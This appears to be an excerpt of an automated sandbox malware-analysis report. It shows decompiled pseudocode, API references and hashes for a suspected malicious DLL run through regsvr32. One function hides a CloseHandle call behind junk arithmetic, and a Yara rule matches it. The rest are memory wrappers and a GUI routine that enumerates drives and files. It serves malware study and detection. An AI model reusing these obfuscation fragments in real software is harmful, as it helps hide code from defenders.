                                                                                                                					_t12 =  *0x1006c2d4; // 0x0
                                                                                                                					_push(__ebx);
                                                                                                                					_t10 = 0;
                                                                                                                					__eflags = _t12;
                                                                                                                					_push(__esi);
                                                                                                                					_t16 = _t12;
                                                                                                                					if(__eflags > 0) {
                                                                                                                						do {
                                                                                                                							 *((char*)(_t10 + _t3)) = _t10;
                                                                                                                							_t10 = _t10 + 1;
                                                                                                                							__eflags = _t10 -  *0x1006c2d4; // 0x0
                                                                                                                						} while (__eflags < 0);
                                                                                                                					}
                                                                                                                					_push(_t3); // executed
                                                                                                                					E1003B59D(_t10, _t14, _t16, __eflags); // executed
                                                                                                                					asm("sbb eax, eax");
                                                                                                                					_t8 =  ~(_t10 - _t16) & 0x00000003;
                                                                                                                					__eflags = _t8;
                                                                                                                					return _t8;
                                                                                                                				} else {
                                                                                                                					return _t3;
                                                                                                                				}
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • _malloc.LIBCMT ref: 10008AF6
                                                                                                                  • Part of subcall function 1003B4DA: __FF_MSGBANNER.LIBCMT ref: 1003B4FD
                                                                                                                  • Part of subcall function 1003B4DA: __NMSG_WRITE.LIBCMT ref: 1003B504
                                                                                                                  • Part of subcall function 1003B4DA: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,10046716,?,00000001,00000001,10043228,00000018,10069028,0000000C,100432B7,00000001), ref: 1003B552
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap_malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 501242067-0
                                                                                                                • Opcode ID: 4aed004172c8a00353551a7f57a5b1c22511ca21975a12fc2129482ef44676f9
                                                                                                                • Instruction ID: b4225be5a86c1b20f78b8c44add161eaa028dc11eaf13bf15bfbc5b258e60bf6
                                                                                                                • Opcode Fuzzy Hash: 4aed004172c8a00353551a7f57a5b1c22511ca21975a12fc2129482ef44676f9
                                                                                                                • Instruction Fuzzy Hash: D9E0DFB2A402274BFF00CBFC9CEAD223289EB18091B440534FD82CA246E364F9048361
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 25%
                                                                                                                			E10040E1E() {
                                                                                                                				void* _t1;
                                                                                                                				void* _t2;
                                                                                                                				void* _t3;
                                                                                                                				void* _t4;
                                                                                                                				void* _t7;
                                                                                                                
                                                                                                                				_push(1);
                                                                                                                				_push(0);
                                                                                                                				_push(0); // executed
                                                                                                                				_t1 = E10040D3F(_t2, _t3, _t4, _t7); // executed
                                                                                                                				return _t1;
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • _doexit.LIBCMT ref: 10040E24
                                                                                                                  • Part of subcall function 10040D3F: __lock.LIBCMT ref: 10040D4D
                                                                                                                  • Part of subcall function 10040D3F: __decode_pointer.LIBCMT ref: 10040D7C
                                                                                                                  • Part of subcall function 10040D3F: __decode_pointer.LIBCMT ref: 10040D89
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __decode_pointer$__lock_doexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 3276244213-0
                                                                                                                • Opcode ID: 97d4102892187832ff4b1b75b5546cda8401932d03e1046da499ccbf3089c980
                                                                                                                • Instruction ID: c600115bdb9250202a11f0fe297c8b3a021a628b260ec84747a29f7a13455f8b
                                                                                                                • Opcode Fuzzy Hash: 97d4102892187832ff4b1b75b5546cda8401932d03e1046da499ccbf3089c980
                                                                                                                • Instruction Fuzzy Hash: 0FA00269FD431921F865D1902C53F5421015750F01FE40460BF087C1C1A4E6325C945B
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 85%
                                                                                                                			E001B02D8(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				void* _t45;
                                                                                                                				int _t59;
                                                                                                                				signed int _t61;
                                                                                                                				signed int _t62;
                                                                                                                				signed int _t63;
                                                                                                                				signed int _t64;
                                                                                                                				void* _t75;
                                                                                                                
                                                                                                                				_push(_a8);
                                                                                                                				_t75 = __ecx;
                                                                                                                				_push(_a4);
                                                                                                                				_push(__ecx);
                                                                                                                				E001AC98A(_t45);
                                                                                                                				_v12 = 0xd4268f;
                                                                                                                				_t61 = 0x55;
                                                                                                                				_v12 = _v12 / _t61;
                                                                                                                				_t62 = 0x39;
                                                                                                                				_v12 = _v12 / _t62;
                                                                                                                				_t63 = 0x19;
                                                                                                                				_v12 = _v12 / _t63;
                                                                                                                				_v12 = _v12 ^ 0x00038c24;
                                                                                                                				_v16 = 0xae7fc4;
                                                                                                                				_v16 = _v16 + 0x7c1;
                                                                                                                				_v16 = _v16 ^ 0x00ac1f44;
                                                                                                                				_v8 = 0x83f9bc;
                                                                                                                				_v8 = _v8 ^ 0x1ab9b921;
                                                                                                                				_v8 = _v8 | 0xa5451e1d;
                                                                                                                				_t64 = 0x5c;
                                                                                                                				_v8 = _v8 / _t64;
                                                                                                                				_v8 = _v8 ^ 0x021ff71d;
                                                                                                                				E001A7F78(_t64, 0xbd3f148a, _t64, 0x72, _t64, 0x529e328);
                                                                                                                				_t59 = CloseHandle(_t75); // executed
                                                                                                                				return _t59;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 001B0384
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 2962429428-0
                                                                                                                • Opcode ID: e059c3c066ff345504bba9c85b1d4992eba54445fe3d98b1d9d536134e0d9d68
                                                                                                                • Instruction ID: ecc97d06b9f346d72fd1fb80af9c5d39486966fdd124c3942b58788fc7defad8
                                                                                                                • Opcode Fuzzy Hash: e059c3c066ff345504bba9c85b1d4992eba54445fe3d98b1d9d536134e0d9d68
                                                                                                                • Instruction Fuzzy Hash: F6114F75E01208FFEB08DFA5D80A9EEBBB5EB85314F50C09AE514A7280E7B15F119F40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E100081B0(void* _a4, long _a8, long _a12, long _a16) {
                                                                                                                				void* _t7;
                                                                                                                
                                                                                                                				_t7 = VirtualAlloc(_a4, _a8, _a12, _a16); // executed
                                                                                                                				return _t7;
                                                                                                                			}





                                                                                                                APIs
                                                                                                                • VirtualAlloc.KERNEL32(?,?,?,?), ref: 100081C4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4275171209-0
                                                                                                                • Opcode ID: e13c3a05b67672fea56b28edb14a2e5a60369e52e5ea6350a2376c363afb12c2
                                                                                                                • Instruction ID: d906071c9a55b96112e4aa30e1ba09a444a104f0164b0ab590c831ce1d9e94f6
                                                                                                                • Opcode Fuzzy Hash: e13c3a05b67672fea56b28edb14a2e5a60369e52e5ea6350a2376c363afb12c2
                                                                                                                • Instruction Fuzzy Hash: 0CC002B9608312BFEA04CB54C888C6BB7F9EBC8340F00C90CF599C3210C670E841CB22
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E100081D0(void* _a4, long _a8, long _a12) {
                                                                                                                				int _t5;
                                                                                                                
                                                                                                                				_t5 = VirtualFree(_a4, _a8, _a12); // executed
                                                                                                                				return _t5;
                                                                                                                			}





                                                                                                                APIs
                                                                                                                • VirtualFree.KERNELBASE(?,?,?), ref: 100081DF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 1263568516-0
                                                                                                                • Opcode ID: c86a1ef333587ad7d48c71bd443cb7ea2fab6dbce4a7e32908955ba6df24cc56
                                                                                                                • Instruction ID: e40ca6c62b10dcc4d15d2a9fcd47f89be3de939b678c3a886278e2d8676f4622
                                                                                                                • Opcode Fuzzy Hash: c86a1ef333587ad7d48c71bd443cb7ea2fab6dbce4a7e32908955ba6df24cc56
                                                                                                                • Instruction Fuzzy Hash: 88C048B9218201BFEA04CB10C988C3BB7BAEBC8650F10C90CB88983210C670EC01DA22
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 86%
                                                                                                                			E1000D150(intOrPtr __ecx, void* __eflags) {
                                                                                                                				char _v16;
                                                                                                                				char _v52;
                                                                                                                				char _v56;
                                                                                                                				char _v64;
                                                                                                                				char _v72;
                                                                                                                				char _v76;
                                                                                                                				char _v80;
                                                                                                                				void* _v84;
                                                                                                                				char _v92;
                                                                                                                				char _v96;
                                                                                                                				void* _v100;
                                                                                                                				char _v108;
                                                                                                                				char _v112;
                                                                                                                				char _v116;
                                                                                                                				void* _v124;
                                                                                                                				char _v128;
                                                                                                                				char _v132;
                                                                                                                				char _v136;
                                                                                                                				char _v140;
                                                                                                                				struct _SHFILEINFOA* _v148;
                                                                                                                				char _v152;
                                                                                                                				char _v156;
                                                                                                                				void* _v160;
                                                                                                                				void* _v164;
                                                                                                                				void* _v168;
                                                                                                                				void* _v172;
                                                                                                                				signed int _v176;
                                                                                                                				struct _SHFILEINFOA* _v196;
                                                                                                                				struct _SHFILEINFOA* _v200;
                                                                                                                				intOrPtr _v204;
                                                                                                                				signed int _v212;
                                                                                                                				char _v216;
                                                                                                                				char _v220;
                                                                                                                				signed int _v224;
                                                                                                                				char* _v228;
                                                                                                                				CHAR* _v232;
                                                                                                                				void* _v236;
                                                                                                                				char _v240;
                                                                                                                				char _v244;
                                                                                                                				char _v248;
                                                                                                                				char _v252;
                                                                                                                				char _v260;
                                                                                                                				char _v264;
                                                                                                                				char _v268;
                                                                                                                				char _v272;
                                                                                                                				char _v276;
                                                                                                                				char _v280;
                                                                                                                				void* _v284;
                                                                                                                				char _v288;
                                                                                                                				void* _v292;
                                                                                                                				char _v296;
                                                                                                                				void* _v300;
                                                                                                                				void* _v308;
                                                                                                                				intOrPtr _v316;
                                                                                                                				char _v324;
                                                                                                                				char _v332;
                                                                                                                				char _v336;
                                                                                                                				char _v340;
                                                                                                                				char _v344;
                                                                                                                				void* _v348;
                                                                                                                				char _v352;
                                                                                                                				void* _v356;
                                                                                                                				char _v360;
                                                                                                                				void* _v364;
                                                                                                                				void* _v372;
                                                                                                                				void* _v380;
                                                                                                                				void* _v388;
                                                                                                                				void* _v396;
                                                                                                                				void* _v404;
                                                                                                                				void* _v412;
                                                                                                                				void* _v420;
                                                                                                                				void* _v428;
                                                                                                                				void* _v436;
                                                                                                                				void* _v444;
                                                                                                                				void* _v452;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t281;
                                                                                                                				void* _t292;
                                                                                                                				struct HICON__* _t294;
                                                                                                                				struct HICON__* _t300;
                                                                                                                				struct HICON__* _t307;
                                                                                                                				struct HICON__* _t313;
                                                                                                                				struct HICON__* _t319;
                                                                                                                				struct HICON__* _t326;
                                                                                                                				struct HICON__* _t332;
                                                                                                                				intOrPtr* _t341;
                                                                                                                				CHAR* _t386;
                                                                                                                				char* _t388;
                                                                                                                				signed int _t389;
                                                                                                                				CHAR* _t400;
                                                                                                                				struct HICON__* _t406;
                                                                                                                				struct HICON__* _t413;
                                                                                                                				struct HICON__* _t419;
                                                                                                                				struct HICON__* _t425;
                                                                                                                				struct HICON__* _t432;
                                                                                                                				struct HICON__* _t438;
                                                                                                                				struct HICON__* _t444;
                                                                                                                				struct HICON__* _t460;
                                                                                                                				long _t467;
                                                                                                                				void* _t469;
                                                                                                                				intOrPtr* _t479;
                                                                                                                				void* _t484;
                                                                                                                				void* _t489;
                                                                                                                				void* _t494;
                                                                                                                				int _t501;
                                                                                                                				int _t505;
                                                                                                                				int _t509;
                                                                                                                				intOrPtr* _t535;
                                                                                                                				struct _SHFILEINFOA* _t540;
                                                                                                                				char* _t542;
                                                                                                                				intOrPtr* _t558;
                                                                                                                				char* _t562;
                                                                                                                				char* _t563;
                                                                                                                				signed int** _t566;
                                                                                                                				signed int _t571;
                                                                                                                				signed int _t575;
                                                                                                                				signed int** _t577;
                                                                                                                				intOrPtr* _t586;
                                                                                                                				intOrPtr _t589;
                                                                                                                				intOrPtr* _t590;
                                                                                                                				signed int** _t594;
                                                                                                                				intOrPtr* _t602;
                                                                                                                				void* _t607;
                                                                                                                				struct _SHFILEINFOA* _t608;
                                                                                                                				signed int _t678;
                                                                                                                				intOrPtr _t716;
                                                                                                                				signed int _t719;
                                                                                                                				signed int _t754;
                                                                                                                				char* _t761;
                                                                                                                				signed int _t776;
                                                                                                                				signed int _t788;
                                                                                                                				signed int _t814;
                                                                                                                				void* _t819;
                                                                                                                				signed int _t830;
                                                                                                                				signed int _t833;
                                                                                                                				signed int _t835;
                                                                                                                				signed int _t838;
                                                                                                                				void* _t844;
                                                                                                                				void* _t847;
                                                                                                                				long _t848;
                                                                                                                				long _t850;
                                                                                                                				char* _t852;
                                                                                                                				void* _t855;
                                                                                                                				long _t856;
                                                                                                                				void* _t859;
                                                                                                                				intOrPtr* _t860;
                                                                                                                				signed int _t862;
                                                                                                                				intOrPtr _t865;
                                                                                                                				signed int _t875;
                                                                                                                				signed int _t877;
                                                                                                                				intOrPtr _t878;
                                                                                                                				void* _t879;
                                                                                                                				void* _t880;
                                                                                                                				intOrPtr* _t881;
                                                                                                                
                                                                                                                				_t880 = __eflags;
                                                                                                                				_push(0xffffffff);
                                                                                                                				_push(E10051C60);
                                                                                                                				_push( *[fs:0x0]);
                                                                                                                				_t877 = (_t875 & 0xfffffff8) - 0xa4;
                                                                                                                				_push(_t844);
                                                                                                                				_t281 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_push(_t281 ^ _t877);
                                                                                                                				 *[fs:0x0] =  &_v16;
                                                                                                                				_t865 = __ecx;
                                                                                                                				E10021017(__ecx, _t844);
                                                                                                                				_t845 = SendMessageA;
                                                                                                                				SendMessageA( *(_t865 + 0x20), 0x80, 1,  *(_t865 + 0x7dc));
                                                                                                                				SendMessageA( *(_t865 + 0x20), 0x80, 0,  *(_t865 + 0x7dc));
                                                                                                                				_t607 = _t865 + 0x7d4;
                                                                                                                				 *0x1006f050 = _t865;
                                                                                                                				E1002699F(_t607, _t880, 0x20, 0x20, 0x19, 0, 1);
                                                                                                                				E10023187(_t607, SendMessageA, _t865, _t880);
                                                                                                                				_t292 = E10023187(_t607, SendMessageA, _t865, _t880);
                                                                                                                				_t870 = LoadIconA;
                                                                                                                				_t294 = LoadIconA( *(_t292 + 0xc), 0x88);
                                                                                                                				E1000BF10( *((intOrPtr*)( *((intOrPtr*)(E10023187(_t607, SendMessageA, _t865, _t880) + 0x78)))), _t880,  *((intOrPtr*)(_t865 + 0x7d8)), 0xffffffff, _t294);
                                                                                                                				E10023187(_t607, SendMessageA, _t865, _t880);
                                                                                                                				_t300 = LoadIconA( *(E10023187(_t607, SendMessageA, _t865, _t880) + 0xc), 0x89);
                                                                                                                				E1000BF10( *((intOrPtr*)( *((intOrPtr*)(E10023187(_t607, SendMessageA, _t865, _t880) + 0x78)))), _t880,  *((intOrPtr*)(_t865 + 0x7d8)), 0xffffffff, _t300);
                                                                                                                				E10023187(_t607, _t845, _t865, _t880);
                                                                                                                				_t307 = LoadIconA( *(E10023187(_t607, _t845, _t865, _t880) + 0xc), 0x8a);
                                                                                                                				E1000BF10( *( *(E10023187(_t607, _t845, _t865, _t880) + 0x78)), _t880,  *((intOrPtr*)(_t865 + 0x7d8)), 0xffffffff, _t307);
                                                                                                                				E10023187(_t607, _t845, _t865, _t880);
                                                                                                                				_t313 = LoadIconA( *(E10023187(_t607, _t845, _t865, _t880) + 0xc), 0x8b);
                                                                                                                				E1000BF10( *( *(E10023187(_t607, _t845, _t865, _t880) + 0x78)), _t880,  *((intOrPtr*)(_t865 + 0x7d8)), 0xffffffff, _t313);
                                                                                                                				E10023187(_t607, _t845, _t865, _t880);
                                                                                                                				_t319 = LoadIconA( *(E10023187(_t607, _t845, _t865, _t880) + 0xc), 0x8c);
                                                                                                                				E1000BF10( *( *(E10023187(_t607, _t845, _t865, _t880) + 0x78)), _t880,  *((intOrPtr*)(_t865 + 0x7d8)), 0xffffffff, _t319);
                                                                                                                				E10023187(_t607, _t845, _t865, _t880);
                                                                                                                				_t326 = LoadIconA( *(E10023187(_t607, _t845, _t865, _t880) + 0xc), 0x8d);
                                                                                                                				E1000BF10( *( *(E10023187(_t607, _t845, _t865, _t880) + 0x78)), _t880,  *((intOrPtr*)(_t865 + 0x7d8)), 0xffffffff, _t326);
                                                                                                                				E10023187(_t607, _t845, _t865, _t880);
                                                                                                                				_t332 = LoadIconA( *(E10023187(_t607, _t845, _t865, _t880) + 0xc), 0x8e);
                                                                                                                				_t807 =  *(E10023187(_t607, _t845, _t865, _t880) + 0x78);
                                                                                                                				E1000BF10( *( *(E10023187(_t607, _t845, _t865, _t880) + 0x78)), _t880,  *((intOrPtr*)(_t865 + 0x7d8)), 0xffffffff, _t332);
                                                                                                                				_t846 = _t865 + 0x5a4;
                                                                                                                				_push(_t607);
                                                                                                                				E10011BB0(_t607, _t865 + 0x5a4, _t865 + 0x5a4, _t865);
                                                                                                                				_push(0x1f4);
                                                                                                                				E10011AA0(_t607, _t865 + 0x5a4, _t865 + 0x5a4, _t865, LoadIconA, _t880, 0x10058700);
                                                                                                                				_push(0x1f5);
                                                                                                                				E10011AA0(_t607, _t865 + 0x5a4, _t846, _t865, LoadIconA, _t880, 0x100586f4);
                                                                                                                				_push(0x1f6);
                                                                                                                				E10011AA0(_t607, _t846, _t846, _t865, LoadIconA, _t880, 0x100586ec);
                                                                                                                				_push(0x1f7);
                                                                                                                				E10011AA0(_t607, _t846, _t846, _t865, LoadIconA, _t880, 0x100586e4);
                                                                                                                				_push(0x1f8);
                                                                                                                				E10011AA0(_t607, _t846, _t846, _t865, LoadIconA, _t880, 0x100586dc);
                                                                                                                				 *((intOrPtr*)(_t865 + 0x668)) = E1000C240;
                                                                                                                				_t341 = E100173A6();
                                                                                                                				_t608 = 0;
                                                                                                                				_t881 = _t341;
                                                                                                                				_t637 = 0 | _t881 == 0x00000000;
                                                                                                                				_t882 = _t881 == 0;
                                                                                                                				if(_t881 == 0) {
                                                                                                                					L1:
                                                                                                                					_t341 = E10001000(_t637, _t807, 0x80004005);
                                                                                                                				}
                                                                                                                				_v200 =  *((intOrPtr*)( *((intOrPtr*)( *_t341 + 0xc))))() + 0x10;
                                                                                                                				 *(_t877 + 0xc8) = _t608;
                                                                                                                				E10001DB0( &_v200,  *_t341, 0x10058434, 0xc);
                                                                                                                				E10011A40(_t846, _t846, _t865, _t870, _t608, _t877 + 0x18);
                                                                                                                				E10001DB0( &_v216,  *_t341, 0x10058424, 0xe);
                                                                                                                				E10011A40(_t846, _t846, _t865, _t870, _t608,  &_v224);
                                                                                                                				E10001DB0( &_v232,  &_v224, 0x10058414, 0xc);
                                                                                                                				E10011A40(_t846, _t846, _t865, _t870, _t608,  &_v240);
                                                                                                                				E10001DB0( &_v248,  &_v224, 0x10058404, 0xc);
                                                                                                                				E10011A40(_t846, _t846, _t865, _t870, 1, _t877 + 0x18);
                                                                                                                				E10001DB0( &_v264,  &_v224, 0x100583f4, 0xc);
                                                                                                                				E10011A40(_t846, _t846, _t865, _t870, 1,  &_v272);
                                                                                                                				E10001DB0( &_v280,  &_v272, 0x100583ec, 4);
                                                                                                                				E10011A40(_t846, _t846, _t865, _t870, 2,  &_v288);
                                                                                                                				E10001DB0( &_v296,  &_v272, 0x100583d8, 0x12);
                                                                                                                				E10011A40(_t846, _t846, _t865, _t870, 2, _t877 + 0x18);
                                                                                                                				E10001DB0(_t877 + 0x20,  &_v272, 0x100583c4, 0x12);
                                                                                                                				E10011A40(_t846, _t846, _t865, _t870, 2, _t877 + 0x18);
                                                                                                                				E10001DB0(_t877 + 0x20, _t877 + 0x18, 0x100583b8, 0xa);
                                                                                                                				E10011A40(_t846, _t846, _t865, _t870, 2,  &_v336);
                                                                                                                				E10001DB0( &_v344, _t877 + 0x18, 0x100583ac, 8);
                                                                                                                				E10011A40(_t846, _t846, _t865, _t870, 2,  &_v352);
                                                                                                                				E10001DB0( &_v360, _t877 + 0x18, 0x100583a0, 0xa);
                                                                                                                				E10011A40(_t846, _t846, _t865, _t870, 2, _t877 + 0x18);
                                                                                                                				E10001DB0(_t877 + 0x20, _t877 + 0x18, 0x10058398, 4);
                                                                                                                				E10011A40(_t846, _t846, _t865, _t870, 3, _t877 + 0x18);
                                                                                                                				E10001DB0(_t877 + 0x20, _t877 + 0x18, 0x10058390, 4);
                                                                                                                				E10011A40(_t846, _t846, _t865, _t870, 3, _t877 + 0x18);
                                                                                                                				E10001DB0(_t877 + 0x20, _t877 + 0x18, 0x10058384, 0xa);
                                                                                                                				E10011A40(_t846, _t846, _t865, _t870, 4, _t877 + 0x18);
                                                                                                                				E10001DB0(_t877 + 0x20, _t877 + 0x18, 0x10058370, 0x10);
                                                                                                                				E10011A40(_t846, _t846, _t865, _t870, 4, _t877 + 0x18);
                                                                                                                				_t847 = _t865 + 0x7e0;
                                                                                                                				E1002699F(_t847, _t882, 0x10, 0x10, 0x21, _t608, _t608);
                                                                                                                				_t883 = _t847 - _t608;
                                                                                                                				if(_t847 != _t608) {
                                                                                                                					_t848 =  *(_t847 + 4);
                                                                                                                				} else {
                                                                                                                					_t848 = 0;
                                                                                                                				}
                                                                                                                				_push(SendMessageA( *(_t865 + 0x570), 0x1109, _t608, _t848));
                                                                                                                				E1002688E(_t608,  *(_t865 + 0x570), _t848, _t865, _t883);
                                                                                                                				E1001D270(_t865 + 0x550, _t608, 6, _t608);
                                                                                                                				 *((intOrPtr*)(_t877 + 0x5c)) = E100263F9(_t865 + 0x550, 1, 0x100586d0, _t608, _t608, _t608, _t608, _t608, 0xffff0000, 0xffff0002);
                                                                                                                				_t850 = GetLogicalDriveStringsA(_t608, _t608);
                                                                                                                				_t70 = _t850 + 1; // 0x1
                                                                                                                				_t814 = _t70;
                                                                                                                				_t386 = E100160EC(_t883, _t814);
                                                                                                                				_t878 = _t877 + 4;
                                                                                                                				_v232 = _t386;
                                                                                                                				if(GetLogicalDriveStringsA(_t850, _t386) == _t850 + 0xffffffff) {
                                                                                                                					_t388 =  *(_t878 + 0x2c);
                                                                                                                					_t852 = _t388;
                                                                                                                					 *(_t878 + 0x24) = _t852;
                                                                                                                					_t815 =  &(_t388[1]);
                                                                                                                					do {
                                                                                                                						_t678 =  *_t388;
                                                                                                                						_t388 =  &(_t388[1]);
                                                                                                                						__eflags = _t678;
                                                                                                                					} while (_t678 != 0);
                                                                                                                					_t389 = _t388 - _t815;
                                                                                                                					__eflags = _t389;
                                                                                                                					_v176 = _t389;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						L34:
                                                                                                                						E10001DB0(_t865 + 0x94c, _t815, 0x10056948, _t608);
                                                                                                                						E1001D35E(_t865 + 0x550, _t608);
                                                                                                                						E1001D39A(_t865 + 0x400, _t608);
                                                                                                                						E1001D39A(_t865 + 0x3ac, _t608);
                                                                                                                						E1001D35E(_t865 + 0x4fc, _t608);
                                                                                                                						E1001D35E(_t865 + 0x454, _t608);
                                                                                                                						E1001D35E(_t865 + 0x358, _t608);
                                                                                                                						 *((intOrPtr*)(_t865 + 0x288)) = 0;
                                                                                                                						 *((intOrPtr*)(_t865 + 0x284)) = 0;
                                                                                                                						E1001D2C4(_t865 + 0x454, 0x10056948);
                                                                                                                						E1002A93C( &_v156, __eflags);
                                                                                                                						_push(_t608);
                                                                                                                						_push("data\\*.*");
                                                                                                                						_v72 = 6;
                                                                                                                						_t400 = E1002A9C8( &_v156, _t815, __eflags);
                                                                                                                						_t854 = _t865 + 0x1018;
                                                                                                                						_v232 = _t400;
                                                                                                                						E1001F707(_t865 + 0x1018, _t608, 0xffffffff);
                                                                                                                						__eflags = _v240 - _t608;
                                                                                                                						while(__eflags != 0) {
                                                                                                                							_t540 = E1002A655( &_v128);
                                                                                                                							_t761 =  &_v128;
                                                                                                                							_v196 = _t540;
                                                                                                                							__eflags = E1002A903(_t761);
                                                                                                                							if(__eflags == 0) {
                                                                                                                								_t542 = E100160BC(__eflags, 0x20);
                                                                                                                								_t878 = _t878 + 4;
                                                                                                                								 *((intOrPtr*)(_t878 + 0x1c)) = _t542;
                                                                                                                								__eflags = _t542 - _t608;
                                                                                                                								 *((char*)(_t878 + 0xc0)) = 7;
                                                                                                                								if(__eflags == 0) {
                                                                                                                									_v200 = _t608;
                                                                                                                								} else {
                                                                                                                									_t761 = _t542;
                                                                                                                									_v200 = E10002490(_t815);
                                                                                                                								}
                                                                                                                								_push(_t761);
                                                                                                                								 *((intOrPtr*)(_t878 + 0x20)) = _t878;
                                                                                                                								_push(_t878);
                                                                                                                								_t173 =  &_v128; // 0x70
                                                                                                                								 *((char*)(_t878 + 0xc8)) = 6;
                                                                                                                								E1002AB67(_t608, _t173, _t815, _t854, _t865, __eflags);
                                                                                                                								E10001C90(_v204, _t815, __eflags);
                                                                                                                								_t815 =  *(_t878 + 0x24);
                                                                                                                								E1001F82B(_t608, _t854, _t870,  *((intOrPtr*)(_t854 + 8)),  *(_t878 + 0x24));
                                                                                                                							}
                                                                                                                							__eflags = _v196 - _t608;
                                                                                                                						}
                                                                                                                						_t855 = _t865 + 0x27c;
                                                                                                                						E1002699F(_t855, __eflags, 0x4a, 0x4a, 0xff, 0x14, 1);
                                                                                                                						E10023187(_t608, _t855, _t865, __eflags);
                                                                                                                						_t406 = LoadIconA( *(E10023187(_t608, _t855, _t865, __eflags) + 0xc), 0x94);
                                                                                                                						E1000BF10( *((intOrPtr*)( *((intOrPtr*)(E10023187(_t608, _t855, _t865, __eflags) + 0x78)))), __eflags,  *((intOrPtr*)(_t865 + 0x280)), 0xffffffff, _t406);
                                                                                                                						E10023187(_t608, _t855, _t865, __eflags);
                                                                                                                						_t413 = LoadIconA( *(E10023187(_t608, _t855, _t865, __eflags) + 0xc), 0x91);
                                                                                                                						E1000BF10( *((intOrPtr*)( *((intOrPtr*)(E10023187(_t608, _t855, _t865, __eflags) + 0x78)))), __eflags,  *((intOrPtr*)(_t865 + 0x280)), 0xffffffff, _t413);
                                                                                                                						E10023187(_t608, _t855, _t865, __eflags);
